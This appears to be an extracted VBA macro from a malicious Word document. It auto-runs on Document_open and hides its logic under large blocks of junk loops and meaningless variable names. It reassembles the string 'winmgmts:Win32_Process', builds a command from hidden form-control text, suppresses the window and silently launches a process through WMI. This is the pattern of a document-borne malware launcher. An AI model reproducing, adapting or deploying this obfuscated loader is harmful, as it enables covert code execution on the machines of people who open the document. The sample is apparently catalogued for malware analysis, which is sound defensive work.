Attribute VB_Name = "Honkioltjg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Krqadtuqa, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Vyfnrlnd = Eovirwcctpvbn To Gcezsexcitbo
         Ysnpcjhbsash = Kgulmtkjj
         Rglnpqhdh = Illjmfkdglqss
Next
Select Case Pbfkpjilkcwnc
         Case jhghff
            Dgknyiacgf = CSng(Hex(Ytaosmpbf))
            Fnaaahqrhtvhj = CDate(Uzpcb0lU * CDate(Drozzepdk))
            Ndbnjfgjfz = Avqnsmcmq
            Jxmgyspkqip = 34
            Qtkqaabffjn = Rxqhftfpsp
End Select
   For Nrjcrxarnvzo = Atdabbufpix To Ijfqmmuznptw
         Qgwgphmjnpek = Icaeqcsiifmcu
         Dkefidztci = Yvqlbevrl
Next
Select Case Ftaiyqtmnxx
         Case jhghff
            Afzviiyvy = CSng(Hex(Nrtkyyxaovyl))
            Aciwfkalllwe = CDate(Uzpcb0lU * CDate(Crshzgvgx))
            Pzxviburaig = Sjtbghotxpxxd
            Cztfaiqldp = 34
            Cnaawbsopn = Puurkzyf
End Select
   For Ijqgrzvzx = Ggpcpiyfp To Xhtmlsrp
         Rstmreivalmc = Fgdjjksovfl
         Fncihvjpov = Epjoyruidgfoh
Next
Select Case Cdwoaircixde
         Case jhghff
            Brknlfujzxo = CSng(Hex(Jyhoabbg))
            Hppmmbrvmntb = CDate(Uzpcb0lU * CDate(Avbztdzzjiie))
            Cdgipzdyws = Ibcdhhjln
            Bnhshfhe = 34
            Hsihklqrczirl = Xfbaupvxdeuhg
End Select
Mfpclrruyofr
End Sub
Attribute VB_Name = "Sgrjzpohzof"
Attribute VB_Base = "0{C2893102-5799-4E36-885F-E455A4795C97}{101BFAD4-8B58-4BDF-95D4-63114057CB0C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xvlsgerp"
Function Mzkcdughk()
   For Obctixiyjp = Eefyppymrw To Nasechdhlajom
         Ijlpmtpovl = Bcnussefhfd
         Mtxeurmt = Cghvdymwttr
Next
Select Case Yfrviqdcf
         Case jhghff
            Aarjatwwxmk = CSng(Hex(Wahujkblko))
            Dwedznwquvdhd = CDate(Uzpcb0lU * CDate(Xuesnrgyhjjtv))
            Plrkxxss = Nyqbwzrnleqfw
            Wxwuqtbbr = 34
            Ptycecgtatqx = Rgkjmkpfba
End Select
Etqstimht = Honkioltjg.Krqadtuqa
   For Hkqqefczs = Usybeymbuspmx To Daczbvdwlpkj
         Erqgrczrxc = Uwprystjbcwt
         Qvmltojr = Zfguumca
Next
Select Case Bhhtrrqsi
         Case jhghff
            Wppleelizkdg = CSng(Hex(Smyopzwijain))
            Cxriofcprjqh = CDate(Uzpcb0lU * CDate(Lxxbtbzfsdtc))
            Gocqlrfbtur = Cuoyhidwmch
            Uwenomgoidga = 34
            Mkddjklwldfmt = Ulvvuwiwfgfb
End Select
Auchuplrztc = Etqstimht + Sgrjzpohzof.Oxfwxcpevhsie + Sgrjzpohzof.Zaddwmsuhwnzp + Sgrjzpohzof.Acmmrcev
   For Bgnsofgsasr = Wuymrfoh To Ekqbfqvcf
         Dsjbvahgjkb = Zxhpjbtizxjh
         Bcfqlnnt = Kwfhbtycdwc
Next
Select Case Gsemheuatw
         Case jhghff
            Eduquggus = CSng(Hex(Vmggzhecast))
            Hafphnrziaxpe = CDate(Uzpcb0lU * CDate(Pwnpcfizax))
            Ouwnkfwitbrn = Nnmjqvvvme
            Wryafrmu = 34
            Mmmkhdpof = Psvnrgzyti
End Select
Pskxhvfrug = Auchuplrztc + Sgrjzpohzof.Lnjiddnuzjszn + Sgrjzpohzof.Iarazuvin
   For Grdpiatkaqvn = Rbvlrkpk To Xordvahd
         Wwxryenfoxgzc = Dqnsvevearujq
         Jrjeeuddnnxkw = Ylwdrjtlitarx
Next
Select Case Uxqooopx
         Case jhghff
            Zmzfxuzpd = CSng(Hex(Nmxqpgble))
            Ejszthaii = CDate(Uzpcb0lU * CDate(Yrwtgkzbc))
            Whktxzhom = Tiqmyaro
            Ugofuvarlc = 34
            Ynloajbbubv = Ndtlyjnyvbbwo
End Select
Mzkcdughk = Eqixjigahmlpu + Pskxhvfrug + Eqixjigahmlpu
   For Cpsmlxdtqdi = Gnybdvidljyk To Qtauusmoyvd
         Ovaktcflfy = Hjkqfubhjn
         Inuirocyykt = Yeiyckvblm
Next
Select Case Ysbbxbbv
         Case jhghff
            Giwtqvbl = CSng(Hex(Cfgptigceox))
            Gtvbxajsma = CDate(Uzpcb0lU * CDate(Aciuaazpszsmm))
            Vzrwdfwqauu = Nyqejrtgxi
            Ylsgajopmos = 34
            Ttdmizfw = Ujocvoix
End Select
End Function
Function Mfpclrruyofr()
   For Uyjsgiiyt = Ojtteqot To Kouvtmbikzix
         Pheewepkplh = Tbljxbokkp
         Wgqjxtqkfew = Wkdzzinuch
Next
Select Case Plvldesgqaxza
         Case jhghff
            Rodoeyzarkkk = CSng(Hex(Tuziliiuzb))
            Gtwmeyhrw = CDate(Uzpcb0lU * CDate(Tczpkeattlwxf))
            Pjiwpcoasfe = Ldomnvfgl
            Pyifsjvqnnjyi = 34
            Wechjgzuiqw = Jskerkgqui
End Select
XXXXX = "i3j3j3g4"
Nymrddcjpt = Join(Split("wii3j3j3g4nmi3j3j3g4gm" + "i3j3j3g4ts:i3j3j3g4Wini3j3j3g432i3j3j3g4_i3j3j3g4", XXXXX), "") + Honkioltjg.Krqadtuqa + "rocess"
   For Weygcmhc = Bmnlioidnmm To Atkjaqghyjst
         Crmqdzqgmtrko = Mkqyjymsdglch
         Urqpgmbw = Ethqrpckimzcu
Next
Select Case Pzijrxic
         Case jhghff
            Auzqmknhafefb = CSng(Hex(Jrzrerwioqn))
            Ravqyrrvcuw = CDate(Uzpcb0lU * CDate(Vucvjxxrif))
            Ehdmkzzrap = Ohjuwgxcpt
            Fshpvvjv = 34
            Tknisuwjl = Shcocvbhgwlk
End Select
Set Tnclblcwnorpd = VBA.CreateObject(Nymrddcjpt)
   For Rtjerfguhupdj = Baxkocxzdhyba To Txwhmffo
         Tzdulphyspspf = Uugxtdfrgarh
         Uvlplvdtfsr = Imheryns
Next
Select Case Rpvnhxttifjyu
         Case jhghff
            Ucpbpnfbaxfyw = CSng(Hex(Pxjvuapiww))
            Jmtjraexwxqum = CDate(Uzpcb0lU * CDate(Upbywtzploz))
            Ettfdnwpgnoys = Rhpijmusux
            Jwivsnetc = 34
            Qyoxobnadq = Ezqdnjayhohnt
End Select
Hnkqkgwtnt = Nymrddcjpt + Sgrjzpohzof.Qqvyrwhhg.ControlTipText + Sgrjzpohzof.Wflkwdyzkc.ControlTipText
   For Slwvubths = Aakhxmxqsiwg To Opnmbadej
         Xazxdrpqyv = Dtvsqezvef
         Mfuqoqwrl = Myspqhqrjxgjt
Next
Select Case Majdgritlx
         Case jhghff
            Biyzxhtityoin = CSng(Hex(Iigvbkfdvhi))
            Dfhrtjoik = CDate(Uzpcb0lU * CDate(Czxoombprc))
            Ecwnvfdsor = Oqxoezgxl
            Bnrpjgtxfcud = 34
            Vtdhfukoszxom = Wdzgiuaepulv
End Select
Eolslhxyr = Hnkqkgwtnt + Honkioltjg.Krqadtuqa
   For Atguocpndk = Mfuffmvdii To Dabrlrgui
         Wuvzoaqiuotsg = Ttylervyqo
         Bldicwgxkkmhd = Dtjhvfcx
Next
Select Case Xlhbvelndowqf
         Case jhghff
            Zoyjgrilrsfgh = CSng(Hex(Znqnekzwpgbu))
            Dmorkvqd = CDate(Uzpcb0lU * CDate(Epapjqxdg))
            Iasmlasjdfx = Nfqowkawz
            Pkjnyixno = 34
            Mvfzvyulahgs = Zjhwksjp
End Select
Set Mfpclrruyofr = CreateObject(Eolslhxyr)
   For Zuzfkvfqqctow = Uaewdcnvxlwyy To Grslwqwmivr
         Ghknnudqy = Vlzbunxgtbw
         Kzgxnwamlhpp = Kesyhrfpkr
Next
Select Case Vxlxejfpdnng
         Case jhghff
            Zbjekmte = CSng(Hex(Adokqupp))
            Adbodfjkfwqm = CDate(Uzpcb0lU * CDate(Segghiyqk))
            Buvziyychbvzu = Ciyqmnhir
            Ihvwjssrcko = 34
            Xrkoewemfcfps = Jtlentprhkrdh
End Select
Mfpclrruyofr.XSize = False
   For Dhqatmvnkamm = Rmmturhelph To Rrtpajqqhedfk
         Qofpzdeil = Fmywbtzoe
         Lmduzjijokb = Wksvvniiuve
Next
Select Case Ldjgvlkzdtme
         Case jhghff
            Abgudlkzqbds = CSng(Hex(Hqqyqhyezio))
            Osrfrrshgoa = CDate(Uzpcb0lU * CDate(Ilmicduwsncn))
            Wwcxfmvvhzvmb = Bcpwxzmrq
            Wtwfpsduwl = 34
            Upxmenmpbwq = Mrqxjelsup
End Select
Mfpclrruyofr.YSize = False
   For Lqwknfkvqkwuw = Jihipkwdm To Cmttjtikumza
         Tsewifjboz = Xvmomkysdycwb
         Mctkigzwrs = Hkaytmkv
Next
Select Case Gapbifvqhuftx
         Case jhghff
            Pzsxzvwfgrhc = CSng(Hex(Krgzowtug))
            Balmyonbcenr = CDate(Uzpcb0lU * CDate(Cjujkacuixd))
            Jccusudxulti = Bxexzillmylw
            Gsnjyudyaju = 34
            Piybaggbxdad = Xpdjvwmrb
End Select
Do While Tnclblcwnorpd.Create(PPPP & Mzkcdughk, Lkythvgy, Mfpclrruyofr, Tcoqtjyozby)
Loop
   For Cuvkqtqoqbf = Pvavnwpc To Egyhwzuvxmk
         Gvhdwqdqv = Qteknprnxg
         Smuovghsq = Tzgttlbwiv
Next
Select Case Cvkhivwtbpr
         Case jhghff
            Bchknstsgkk = CSng(Hex(Ycwkhjcvrtlzz))
            Eleirdrjtmuc = CDate(Uzpcb0lU * CDate(Wlzzmxuwrhimu))
            Wkouzoufcq = Tdxmggxuh
            Nazhtwaeihawb = 34
            Xkbfxjtqa = Vbfxpbklbuzg
End Select
End Function


INQUEST-PP=macro
